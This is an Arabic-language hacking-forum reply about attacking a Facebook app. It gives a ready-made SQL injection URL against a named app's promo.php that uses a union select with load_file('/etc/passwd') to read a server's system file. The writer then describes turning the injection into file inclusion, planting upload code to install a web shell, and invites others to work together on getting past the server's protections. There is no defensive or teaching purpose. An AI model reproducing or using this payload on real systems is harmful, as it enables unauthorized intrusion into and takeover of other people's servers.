 | اقتباس |  | | |  |  المشاركة الأصلية كتبت بواسطة kanvi |  | | | |
اهلين اخي نورت الموضوع ..
بالنسبه ياغالي انت اخترقت الـ app facebook او حقنته او نسخت الروابط تبع الحقن من المنتديات
لان جميع ثغرات السكربتات الي في الفي سبوك كلها في مواقع السكيورتي ..:d
وانا جبت الروابط عشان نطورها فقط لا غير ..
والي يهمنا في الموضوع الحقـنه الثانيه الي هي .:
كود PHP:
http://apps.facebook.com/myhotdeals/promo.php?promoid=150+and+1=2+union+all+select+1,2,3,4,5,load_file%28%27/etc/passwd%27%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
لان نقدر .. نغير الـ sql إلـى lfi ونزرع كود رفع الشل ونرفع الشل بس الي بوقف امامنا بعض حمايات السيرفر
ولما نكون مع بعض نفكر ونتخطى الحمايات فلسطين
بالتوفيــق